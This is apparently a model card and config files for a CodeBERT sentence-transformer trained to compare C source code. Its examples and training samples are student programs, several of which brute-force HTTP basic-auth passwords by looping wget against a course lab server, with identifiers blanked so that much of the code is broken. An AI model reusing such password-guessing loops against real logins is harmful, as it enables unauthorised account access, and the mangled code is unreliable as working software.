\ {\n comb[2] = [k];\n if(execPassword(comb,url)==1)\
|
482 |
+
\ return 1;\n }\n comb[1] = '\\0';\n }\n }\n return\
|
483 |
+
\ 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80]\
|
484 |
+
\ = {'\\0'};\n char *passwd;\n char a[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};\n\
|
485 |
+
\ char v[4]={'\\0'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,\"\
|
486 |
+
wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=\");\n\n\
|
487 |
+
\ startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime =\
|
488 |
+
\ time();\n final = stopTime-startTime;\n }\n\n printf (\"\\n The\
|
489 |
+
\ password is : %s\",v);\n printf(\"%lld nanoseconds (%lf) seconds \\n\"\
|
490 |
+
, final, (double)final/OneBillion );\n\n}\n"
|
491 |
+
- "\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
492 |
+
#define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n\
|
493 |
+
\ \n while(1)\n { \n system(\"wget -p http://www.cs.rmit.edu./students\"\
|
494 |
+
);\n\n\n\n system(\"mkdir data\"); \n if((fp=fopen(\"./data/index.html\"\
|
495 |
+
,\"r\"))==NULL)\n { \n system(\"cp www.cs.rmit.edu./students/index.html\
|
496 |
+
\ ./data\");\n\t \n }\n else\n { \n \n\t \n\t\
|
497 |
+
\ system(\"diff ./data/index.html www.cs.rmit.edu./students/index.html | mail\
|
498 |
+
\ @cs.rmit.edu.\");\n\t system(\"cp www.cs.rmit.edu./students/index.html ./data\"\
|
499 |
+
);\n } \n\n\n\n system(\"mkdir images\"); \n if((fp=fopen(\"\
|
500 |
+
./images/file.txt\",\"r\"))==NULL)\n { \n system(\"md5sum www.cs.rmit.edu./images/*.*\
|
501 |
+
\ > ./images/file.txt\");\n\t\t \n }\n \n else\n { \
|
502 |
+
\ \n system(\"md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt\"\
|
503 |
+
);\n\t \n\t \n\t \n\t system(\"diff ./images/file.txt www.cs.rmit.edu./file.txt\
|
504 |
+
\ | mail @cs.rmit.edu.\");\n\t system(\"cp www.cs.rmit.edu./file.txt ./images\"\
|
505 |
+
);\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n\
|
506 |
+
\ \n\t \n\t \t\n"
|
507 |
+
- "#include<stdio.h>\n#include<string.h>\n#include<strings.h>\n#include<stdlib.h>\n\
|
508 |
+
#include<sys/time.h>\n\n\npublic static void main()\n{\n\tint i;\n\tchar ar[100];\n\
|
509 |
+
\tFILE* f;\n\tFILE* ;\n\tsystem(\"wget -O first www.rmit.edu./students\"); \n\
|
510 |
+
\twhile(1)\n\t{\n\t\tsleep(86400);\t\n\t\tsystem(\"rm -f thed\");\n\t\tsystem(\"\
|
511 |
+
rm -f new\");\n\t\tsystem(\"wget -O new www.cs.rmit.edu./students\");\t\n\t\t\
|
512 |
+
system(\"diff new first >thed\");\t\n\t\tf=fopen(\"thed\",\"r\");\n\t\tif(fgets(ar,100,f)!=NULL)\n\
|
513 |
+
\t\t{\t\t\n\t\t\t printf(\"\\n\\n The has CHANGEDS\");\t\t\n\t\t\tsystem(\"mail\
|
514 |
+
\ @cs.rmit.edu. <thed\"); \n\t\t\tsystem(\"cp new first\");\n\t\t\tfclose(f);\n\
|
515 |
+
\t\t}\n\t\telse\n\t\t{\n\t\tfclose(f);\n\t\tprintf(\"\\n\\nthe has not changed\
|
516 |
+
\ \");\n\t\t}\n\t}\n\n}\n\n\t\n\t\n\t\n\t\t\n\n\n"
|
517 |
+
pipeline_tag: sentence-similarity
|
518 |
+
library_name: sentence-transformers
|
519 |
+
---
|
520 |
+
|
521 |
+
# SentenceTransformer based on microsoft/codebert-base
|
522 |
+
|
523 |
+
This is a [sentence-transformers](https://www.SBERT.net) model fine-tuned from [microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base). It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
|
524 |
+
|
525 |
+
## Model Details
|
526 |
+
|
527 |
+
### Model Description
|
528 |
+
- **Model Type:** Sentence Transformer
|
529 |
+
- **Base model:** [microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base) <!-- at revision 3b0952feddeffad0063f274080e3c23d75e7eb39 -->
|
530 |
+
- **Maximum Sequence Length:** 512 tokens
|
531 |
+
- **Output Dimensionality:** 768 dimensions
|
532 |
+
- **Similarity Function:** Cosine Similarity
|
533 |
+
<!-- - **Training Dataset:** Unknown -->
|
534 |
+
<!-- - **Language:** Unknown -->
|
535 |
+
<!-- - **License:** Unknown -->
|
536 |
+
|
537 |
+
### Model Sources
|
538 |
+
|
539 |
+
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
|
540 |
+
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
|
541 |
+
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
|
542 |
+
|
543 |
+
### Full Model Architecture
|
544 |
+
|
545 |
+
```
|
546 |
+
SentenceTransformer(
|
547 |
+
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
|
548 |
+
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
|
549 |
+
)
|
550 |
+
```
|
551 |
+
|
552 |
+
## Usage
|
553 |
+
|
554 |
+
### Direct Usage (Sentence Transformers)
|
555 |
+
|
556 |
+
First install the Sentence Transformers library:
|
557 |
+
|
558 |
+
```bash
|
559 |
+
pip install -U sentence-transformers
|
560 |
+
```
|
561 |
+
|
562 |
+
Then you can load this model and run inference.
|
563 |
+
```python
|
564 |
+
from sentence_transformers import SentenceTransformer
|
565 |
+
|
566 |
+
# Download from the 🤗 Hub
|
567 |
+
model = SentenceTransformer("buelfhood/SOCO-C-CodeBERT-ST")
|
568 |
+
# Run inference
|
569 |
+
sentences = [
|
570 |
+
'\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\nint ()\n{\n int i,j,k,counter =0;\n char word[3];\n char paswd[3];\t\n char get[100];\n int ;\n char username[]="";\n \n \n \n \n \n\t\t\t\t\n\t\n\tfor (i = 65; i <= 122; i++)\n\t{\n\t\t if(i==91) {i=97;} \n \n\t\tfor (j = 65; j <= 122; j++)\n\t\t{\n\t\t\n\t\tif(j==91) {j=97;}\n \n\t\tfor (k = 65; k <= 122; k++)\n\t\t{\n\t\t \n\t\t\tif(k==91) {k=97;} \n\t\t\t\n\t\t\t word[0] = i;\n\t\t\t word[1] = j;\n\t\t\t word[2] = k;\n\t\t\t sprintf(paswd,"%c%c%c",word[0],word[1],word[2]); \n\t\t\t counter++;\n\t\t\tprintf("%d )%s\\n\\n", counter, paswd);\n\t\t\t sprintf(get,"wget --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,paswd);\n\t\t\t=system(get);\n\t \n\t\t\tif(==0) \n\t\t\t{\n\t\t\tprintf("The Password has been cracked and it is : %s" , paswd);\n\t\t\texit(0);\n\t\t\t}\n\t\t}\n \n\t\t}\n \n\t}\n \n\t\n}\n\n',
|
571 |
+
'\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n \n while(1)\n { \n system("wget -p http://www.cs.rmit.edu./students");\n\n\n\n system("mkdir data"); \n if((fp=fopen("./data/index.html","r"))==NULL)\n { \n system("cp www.cs.rmit.edu./students/index.html ./data");\n\t \n }\n else\n { \n \n\t \n\t system("diff ./data/index.html www.cs.rmit.edu./students/index.html | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./students/index.html ./data");\n } \n\n\n\n system("mkdir images"); \n if((fp=fopen("./images/file.txt","r"))==NULL)\n { \n system("md5sum www.cs.rmit.edu./images/*.* > ./images/file.txt");\n\t\t \n }\n \n else\n { \n system("md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt");\n\t \n\t \n\t \n\t system("diff ./images/file.txt www.cs.rmit.edu./file.txt | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./file.txt ./images");\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
|
572 |
+
'\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\n#define OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char *, char *b) {\n\n\n char [100]={\'\\0\'};\n strcpy(,b);\n \n strcat(,);\n printf ("Sending command %s\\n",);\n if ( system()== 0) {\n printf ("\\n password is : %s",);\n return 1;\n }\n return 0;\n}\n \n\nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52 ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++) {\n comb[2] = [k];\n if(execPassword(comb,url)==1) return 1;\n }\n comb[1] = \'\\0\';\n }\n }\n return 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80] = {\'\\0\'};\n char *passwd;\n char a[] = {\'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\',\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'K\',\'L\',\'M\',\'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\'};\n char v[4]={\'\\0\'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,"wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=");\n\n startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime = time();\n final = stopTime-startTime;\n }\n\n printf ("\\n The password is : %s",v);\n printf("%lld nanoseconds (%lf) seconds \\n", final, (double)final/OneBillion );\n\n}\n',
|
573 |
+
]
|
574 |
+
embeddings = model.encode(sentences)
|
575 |
+
print(embeddings.shape)
|
576 |
+
# (3, 768)
|
577 |
+
|
578 |
+
# Get the similarity scores for the embeddings
|
579 |
+
similarities = model.similarity(embeddings, embeddings)
|
580 |
+
print(similarities)
|
581 |
+
# tensor([[1.0000, 0.9892, 0.9953],
|
582 |
+
# [0.9892, 1.0000, 0.9908],
|
583 |
+
# [0.9953, 0.9908, 1.0000]])
|
584 |
+
```
|
585 |
+
|
586 |
+
<!--
|
587 |
+
### Direct Usage (Transformers)
|
588 |
+
|
589 |
+
<details><summary>Click to see the direct usage in Transformers</summary>
|
590 |
+
|
591 |
+
</details>
|
592 |
+
-->
|
593 |
+
|
594 |
+
<!--
|
595 |
+
### Downstream Usage (Sentence Transformers)
|
596 |
+
|
597 |
+
You can finetune this model on your own dataset.
|
598 |
+
|
599 |
+
<details><summary>Click to expand</summary>
|
600 |
+
|
601 |
+
</details>
|
602 |
+
-->
|
603 |
+
|
604 |
+
<!--
|
605 |
+
### Out-of-Scope Use
|
606 |
+
|
607 |
+
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
|
608 |
+
-->
|
609 |
+
|
610 |
+
<!--
|
611 |
+
## Bias, Risks and Limitations
|
612 |
+
|
613 |
+
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
|
614 |
+
-->
|
615 |
+
|
616 |
+
<!--
|
617 |
+
### Recommendations
|
618 |
+
|
619 |
+
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
|
620 |
+
-->
|
621 |
+
|
622 |
+
## Training Details
|
623 |
+
|
624 |
+
### Training Dataset
|
625 |
+
|
626 |
+
#### Unnamed Dataset
|
627 |
+
|
628 |
+
* Size: 3,081 training samples
|
629 |
+
* Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
|
630 |
+
* Approximate statistics based on the first 1000 samples:
|
631 |
+
| | sentence_0 | sentence_1 | label |
|
632 |
+
|:--------|:--------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------|:-----------------------------------------------|
|
633 |
+
| type | string | string | int |
|
634 |
+
| details | <ul><li>min: 194 tokens</li><li>mean: 471.57 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 194 tokens</li><li>mean: 458.65 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.20%</li><li>1: ~0.80%</li></ul> |
|
635 |
+
* Samples:
|
636 |
+
| sentence_0 | sentence_1 | label |
|
637 |
+
|:-----------|:-----------|:------|
|
638 |
+
| <code>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br>#include<sys/time.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br><br><br><br>int ()<br>{<br> int i,j,k,syst;<br> char password[4],first[100],last[100];<br> int count =0; <br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(first, "wget --http-user= --http-passwd=");<br> strcpy(last, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> int Start_time,End_time,Total_time,average; <br> Start_time = time();<br>printf(" Time =%11dms\n", Start_time);<br> for (i=0;i<=52;i++)<br> {<br> for (j=0;j<=52;j++)<br> {<br> for(k=0;k<=52;k++)<br> {<br> password[0] = arr[i];<br> password[1] = arr[j];<br> password[2] = arr[k];<br> password[3] = '\0';<br> printf(" The Combination of the password tried %s \n" ,password);<br> printf("*...</code> | <code>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br><br><br><br>int ()<br>{<br> int i,j,k,sysoutput;<br> char pass[4],b[50], a[50],c[51] ,[2],string1[100],string2[100],temp1[3];<br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(string1, "wget --http-user= --http-passwd=");<br> strcpy(string2, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> <br> for (i=0;i<=52;i++)<br> { <br> [0] = arr[i];<br> [1] ='\0'; <br> strcpy(a,);<br> <br> printf("The first value is %s \n", a); <br><br> for (j=0;j<=52;j++)<br> { [0] = arr[j];<br> [1] = '\0'; <br> strcpy(temp1,a);<br> strcat(a,);<br> strcpy(b,a);<br> strcpy(a,temp1);<br> printf("The second value is %s \n", b); <br> 
for(k=0;k<=52;k++)<br> { <br> [0] =arr[k];<br> [1] = '\0...</code> | <code>1</code> |
|
639 |
+
| <code>#include<stdio.h><br>#include<string.h><br>#include<strings.h><br>#include<stdlib.h><br>#include<sys/time.h><br><br>()<br>{<br> int i,m,k,count=0;<br> FILE* diction;<br> FILE* log;<br> char s[30];<br> char pic[30];<br> char add[1000];<br> char end[100];<br> time_t ,finish;<br> double ttime;<br> <br> strcpy(add,"wget --http-user= --http-passwd=");<br> strcpy( end,"-nv -o logd http://sec-crack.cs.rmit.edu./SEC/2/");<br> diction=fopen("/usr/share/lib/dict/words","r");<br> =time(NULL);<br> while(fgets(s,100,diction)!=NULL) <br> { <br> printf("%s\n",s);<br> for(m=40,k=0;k<(strlen(s)-1);k++,m++)<br> {<br> add[m]=s[k];<br> }<br> add[m++]=' ';<br> for(i=0;i<50;i++,m++)<br> {<br> add[m]=end[i];<br> }<br> add[m]='\0';<br> <br> system(add);<br> count++;<br> log=fopen("logd","r");<br> fgets(pic,100,log);<br> printf("%s",pic);<br> if(strcmp(pic,"Authorization failed.\n")!=0) <br> {<br> finish=time(NULL);<br> ttime=difftime(,finish);<br> printf( "\n The time_var take:%f/n The of passwords tried is %d\n",ttime,count);<br> break;<br> }<br> fclose(log);<br> }<br><br>}<br></code> | <code><br><br><br><br>#include <stdio.h><br>#include <stdlib.h><br>#include <time.h><br><br>int () <br>{<br> int i,j,k,cntr=0;<br> char pass[3];<br> char password[3];<br> char get[96];<br> char username[]="";<br> int R_VALUE;<br> double time_used;<br> <br> clock_t ,end; <br> <br> =clock(); <br> <br> <br> <br> for (i = 65; i <= 122; i++)<br> {<br> if(i==91) {i=97;}<br> <br> for (j = 65; j <= 122; j++)<br> {<br> if(j==91) {j=97;}<br> <br> for (k = 65; k <= 122; k++)<br> {<br> if(k==91) {k=97;} <br> <br> pass[0] = i;<br> pass[1] = j;<br> pass[2] = k;<br> sprintf(password,"%c%c%c",pass[0],pass[1],pass[2]); <br> cntr++;<br> <br> printf("%d )%s\n\n", cntr, password);<br> sprintf(get,"wget --non-verbose --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,password);<br> <br><br> R_VALUE=system(get);<br> <br> if(R_VALUE==0) <br> {<br> printf("The Password has been cracked and it 
is : %s" , password);<br> ...</code> | <code>0</code> |
|
640 |
+
| <code><br><br> <br> <br><br><br>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br><br> <br> int ()<br> {<br> char url[30];<br> int exitValue=-1;<br> FILE *fr;<br><br> char s[300]; <br> system("rm index.html*");<br> system("wget http://www.cs.rmit.edu./students/ "); <br> system("mv index.html one.html");<br> <br> printf("System completed Writing\n"); <br> system("sleep 3600");<br> <br> <br> system("wget http://www.cs.rmit.edu./students/ "); <br> <br> <br> <br> exitValue=system("diff one.html index.html > .out" );<br> <br> fr=fopen(".out","r");<br> <br> strcpy(s,"mailx -s \"Testing Again\"");<br> <br> strcat(s," < .out");<br> if(fgets(url,30,fr))<br> {<br> system(s);<br> <br> system("rm one.html"); <br> <br> printf("\nCheck your mail") ; <br> fclose(fr); <br> }<br> else<br> {<br> printf(" changes detected"); <br> <br> system("rm one.html"); <br> fc...</code> | <code>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br>#include<ctype.h><br>#include<time.h><br><br>int ()<br>{<br><br> int m,n,o,i;<br> time_t u1,u2;<br> char v[3];<br> char temp1[100];<br> char temp2[100];<br> char temp3[250];<br> FILE *fin1;<br> <br> char point[25];<br> fin1=fopen("./words.txt","r");<br> <br> if(fin1==NULL)<br> {<br> printf(" open the file ");<br> exit(0);<br> } <br> <br><br> strcpy(temp2," --http-user= --http-passwd=");<br> strcpy(temp1,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php");<br> <br> strcpy(temp3,"");<br> <br> (void) time(&u1); <br> <br> while(!feof(fin1)) <br> {<br> <br> fgets(point,25,fin1);<br> if(strlen(point)<=4)<br> {<br> <br> <br> strcpy(temp3,temp1);<br> strcat(temp3,temp2);<br> strcat(temp3,point);<br> printf("\nSending the %s\n",temp3);<br> i=system(temp3); <br> <br> if(i==0)<br> {<br> (void) time(&u2); <br> printf("\n The password is %s\n",point);<br> printf("\n\nThe time_var taken crack the passwork is %d second\n\n",(int)(u2-u1));<br> exit(0);<br> } <br> else<br> {<br> strcpy(temp3,"");<br> }<br> <br> <br> }<br> }<br> <br> <br>} 
...</code> | <code>0</code> |
|
641 |
+
* Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss)
|
642 |
+
|
643 |
+
### Training Hyperparameters
|
644 |
+
#### Non-Default Hyperparameters
|
645 |
+
|
646 |
+
- `per_device_train_batch_size`: 16
|
647 |
+
- `per_device_eval_batch_size`: 16
|
648 |
+
- `num_train_epochs`: 1
|
649 |
+
- `fp16`: True
|
650 |
+
- `multi_dataset_batch_sampler`: round_robin
|
651 |
+
|
652 |
+
#### All Hyperparameters
|
653 |
+
<details><summary>Click to expand</summary>
|
654 |
+
|
655 |
+
- `overwrite_output_dir`: False
|
656 |
+
- `do_predict`: False
|
657 |
+
- `eval_strategy`: no
|
658 |
+
- `prediction_loss_only`: True
|
659 |
+
- `per_device_train_batch_size`: 16
|
660 |
+
- `per_device_eval_batch_size`: 16
|
661 |
+
- `per_gpu_train_batch_size`: None
|
662 |
+
- `per_gpu_eval_batch_size`: None
|
663 |
+
- `gradient_accumulation_steps`: 1
|
664 |
+
- `eval_accumulation_steps`: None
|
665 |
+
- `torch_empty_cache_steps`: None
|
666 |
+
- `learning_rate`: 5e-05
|
667 |
+
- `weight_decay`: 0.0
|
668 |
+
- `adam_beta1`: 0.9
|
669 |
+
- `adam_beta2`: 0.999
|
670 |
+
- `adam_epsilon`: 1e-08
|
671 |
+
- `max_grad_norm`: 1
|
672 |
+
- `num_train_epochs`: 1
|
673 |
+
- `max_steps`: -1
|
674 |
+
- `lr_scheduler_type`: linear
|
675 |
+
- `lr_scheduler_kwargs`: {}
|
676 |
+
- `warmup_ratio`: 0.0
|
677 |
+
- `warmup_steps`: 0
|
678 |
+
- `log_level`: passive
|
679 |
+
- `log_level_replica`: warning
|
680 |
+
- `log_on_each_node`: True
|
681 |
+
- `logging_nan_inf_filter`: True
|
682 |
+
- `save_safetensors`: True
|
683 |
+
- `save_on_each_node`: False
|
684 |
+
- `save_only_model`: False
|
685 |
+
- `restore_callback_states_from_checkpoint`: False
|
686 |
+
- `no_cuda`: False
|
687 |
+
- `use_cpu`: False
|
688 |
+
- `use_mps_device`: False
|
689 |
+
- `seed`: 42
|
690 |
+
- `data_seed`: None
|
691 |
+
- `jit_mode_eval`: False
|
692 |
+
- `use_ipex`: False
|
693 |
+
- `bf16`: False
|
694 |
+
- `fp16`: True
|
695 |
+
- `fp16_opt_level`: O1
|
696 |
+
- `half_precision_backend`: auto
|
697 |
+
- `bf16_full_eval`: False
|
698 |
+
- `fp16_full_eval`: False
|
699 |
+
- `tf32`: None
|
700 |
+
- `local_rank`: 0
|
701 |
+
- `ddp_backend`: None
|
702 |
+
- `tpu_num_cores`: None
|
703 |
+
- `tpu_metrics_debug`: False
|
704 |
+
- `debug`: []
|
705 |
+
- `dataloader_drop_last`: False
|
706 |
+
- `dataloader_num_workers`: 0
|
707 |
+
- `dataloader_prefetch_factor`: None
|
708 |
+
- `past_index`: -1
|
709 |
+
- `disable_tqdm`: False
|
710 |
+
- `remove_unused_columns`: True
|
711 |
+
- `label_names`: None
|
712 |
+
- `load_best_model_at_end`: False
|
713 |
+
- `ignore_data_skip`: False
|
714 |
+
- `fsdp`: []
|
715 |
+
- `fsdp_min_num_params`: 0
|
716 |
+
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
|
717 |
+
- `fsdp_transformer_layer_cls_to_wrap`: None
|
718 |
+
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
|
719 |
+
- `deepspeed`: None
|
720 |
+
- `label_smoothing_factor`: 0.0
|
721 |
+
- `optim`: adamw_torch
|
722 |
+
- `optim_args`: None
|
723 |
+
- `adafactor`: False
|
724 |
+
- `group_by_length`: False
|
725 |
+
- `length_column_name`: length
|
726 |
+
- `ddp_find_unused_parameters`: None
|
727 |
+
- `ddp_bucket_cap_mb`: None
|
728 |
+
- `ddp_broadcast_buffers`: False
|
729 |
+
- `dataloader_pin_memory`: True
|
730 |
+
- `dataloader_persistent_workers`: False
|
731 |
+
- `skip_memory_metrics`: True
|
732 |
+
- `use_legacy_prediction_loop`: False
|
733 |
+
- `push_to_hub`: False
|
734 |
+
- `resume_from_checkpoint`: None
|
735 |
+
- `hub_model_id`: None
|
736 |
+
- `hub_strategy`: every_save
|
737 |
+
- `hub_private_repo`: None
|
738 |
+
- `hub_always_push`: False
|
739 |
+
- `gradient_checkpointing`: False
|
740 |
+
- `gradient_checkpointing_kwargs`: None
|
741 |
+
- `include_inputs_for_metrics`: False
|
742 |
+
- `include_for_metrics`: []
|
743 |
+
- `eval_do_concat_batches`: True
|
744 |
+
- `fp16_backend`: auto
|
745 |
+
- `push_to_hub_model_id`: None
|
746 |
+
- `push_to_hub_organization`: None
|
747 |
+
- `mp_parameters`:
|
748 |
+
- `auto_find_batch_size`: False
|
749 |
+
- `full_determinism`: False
|
750 |
+
- `torchdynamo`: None
|
751 |
+
- `ray_scope`: last
|
752 |
+
- `ddp_timeout`: 1800
|
753 |
+
- `torch_compile`: False
|
754 |
+
- `torch_compile_backend`: None
|
755 |
+
- `torch_compile_mode`: None
|
756 |
+
- `include_tokens_per_second`: False
|
757 |
+
- `include_num_input_tokens_seen`: False
|
758 |
+
- `neftune_noise_alpha`: None
|
759 |
+
- `optim_target_modules`: None
|
760 |
+
- `batch_eval_metrics`: False
|
761 |
+
- `eval_on_start`: False
|
762 |
+
- `use_liger_kernel`: False
|
763 |
+
- `eval_use_gather_object`: False
|
764 |
+
- `average_tokens_across_devices`: False
|
765 |
+
- `prompts`: None
|
766 |
+
- `batch_sampler`: batch_sampler
|
767 |
+
- `multi_dataset_batch_sampler`: round_robin
|
768 |
+
- `router_mapping`: {}
|
769 |
+
- `learning_rate_mapping`: {}
|
770 |
+
|
771 |
+
</details>
|
772 |
+
|
773 |
+
### Framework Versions
|
774 |
+
- Python: 3.11.13
|
775 |
+
- Sentence Transformers: 5.0.0
|
776 |
+
- Transformers: 4.52.4
|
777 |
+
- PyTorch: 2.6.0+cu124
|
778 |
+
- Accelerate: 1.8.1
|
779 |
+
- Datasets: 3.6.0
|
780 |
+
- Tokenizers: 0.21.2
|
781 |
+
|
782 |
+
## Citation
|
783 |
+
|
784 |
+
### BibTeX
|
785 |
+
|
786 |
+
#### Sentence Transformers
|
787 |
+
```bibtex
|
788 |
+
@inproceedings{reimers-2019-sentence-bert,
|
789 |
+
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
|
790 |
+
author = "Reimers, Nils and Gurevych, Iryna",
|
791 |
+
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
|
792 |
+
month = "11",
|
793 |
+
year = "2019",
|
794 |
+
publisher = "Association for Computational Linguistics",
|
795 |
+
url = "https://arxiv.org/abs/1908.10084",
|
796 |
+
}
|
797 |
+
```
|
798 |
+
|
799 |
+
#### BatchAllTripletLoss
|
800 |
+
```bibtex
|
801 |
+
@misc{hermans2017defense,
|
802 |
+
title={In Defense of the Triplet Loss for Person Re-Identification},
|
803 |
+
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
|
804 |
+
year={2017},
|
805 |
+
eprint={1703.07737},
|
806 |
+
archivePrefix={arXiv},
|
807 |
+
primaryClass={cs.CV}
|
808 |
+
}
|
809 |
+
```
|
810 |
+
|
811 |
+
<!--
|
812 |
+
## Glossary
|
813 |
+
|
814 |
+
*Clearly define terms in order to be accessible across audiences.*
|
815 |
+
-->
|
816 |
+
|
817 |
+
<!--
|
818 |
+
## Model Card Authors
|
819 |
+
|
820 |
+
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
|
821 |
+
-->
|
822 |
+
|
823 |
+
<!--
|
824 |
+
## Model Card Contact
|
825 |
+
|
826 |
+
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
|
827 |
+
-->
|
config.json
ADDED
@@ -0,0 +1,27 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"architectures": [
|
3 |
+
"RobertaModel"
|
4 |
+
],
|
5 |
+
"attention_probs_dropout_prob": 0.1,
|
6 |
+
"bos_token_id": 0,
|
7 |
+
"classifier_dropout": null,
|
8 |
+
"eos_token_id": 2,
|
9 |
+
"hidden_act": "gelu",
|
10 |
+
"hidden_dropout_prob": 0.1,
|
11 |
+
"hidden_size": 768,
|
12 |
+
"initializer_range": 0.02,
|
13 |
+
"intermediate_size": 3072,
|
14 |
+
"layer_norm_eps": 1e-05,
|
15 |
+
"max_position_embeddings": 514,
|
16 |
+
"model_type": "roberta",
|
17 |
+
"num_attention_heads": 12,
|
18 |
+
"num_hidden_layers": 12,
|
19 |
+
"output_past": true,
|
20 |
+
"pad_token_id": 1,
|
21 |
+
"position_embedding_type": "absolute",
|
22 |
+
"torch_dtype": "float32",
|
23 |
+
"transformers_version": "4.52.4",
|
24 |
+
"type_vocab_size": 1,
|
25 |
+
"use_cache": true,
|
26 |
+
"vocab_size": 50265
|
27 |
+
}
|
config_sentence_transformers.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"model_type": "SentenceTransformer",
|
3 |
+
"__version__": {
|
4 |
+
"sentence_transformers": "5.0.0",
|
5 |
+
"transformers": "4.52.4",
|
6 |
+
"pytorch": "2.6.0+cu124"
|
7 |
+
},
|
8 |
+
"prompts": {
|
9 |
+
"query": "",
|
